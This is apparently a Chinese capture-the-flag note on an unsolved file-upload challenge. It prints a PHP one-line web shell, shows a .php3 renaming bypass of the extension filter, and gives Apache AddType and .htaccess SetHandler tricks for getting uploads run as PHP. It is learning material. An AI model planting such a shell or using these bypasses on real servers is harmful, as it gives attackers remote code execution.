此题暂时还未解出,做个记录。
解题过程:
? ? 上传文件a.php,内容为:<?php eval($_POST['shell']);?>
? ? 得到提示:
? ? ?对文件类型进行了过滤,把文件名改为a.php3后,可以成功上传:
? ? 但文件名变为了一串数字。?虽然我们上传成功了,但是 201111211141527218.php3?却不能解析,要正常解析还需要满足以下条件任意一种:
条件一:Apache的 httpd.conf 中有如下配置代码:
AddType application/x-httpd-php .php .phtml .phps .php5 .pht .php3? ? 这样配置后,Apache可以将?.phtml .phps .php5 .pht .php3文件解析为php文件。
? ? 问题:但是作为解题者如何才能修改到?httpd.conf文件???
条件二:上传 .htaccess?伪静态文件,内容如下:
<FilesMatch "phpfile">
SetHandler application/x-httpd-php
</FilesMatch>用伪静态需要保证:①mod_rewrite模块开启;②目录设置是AllowOverride All;
? ? 这样上传文件名匹配到phpfile,不管是什么类型的文件,都会以php文件解析。
? ? 问题:但是文件名会被修改为一串数字,这个方法也行不通。
源码:?
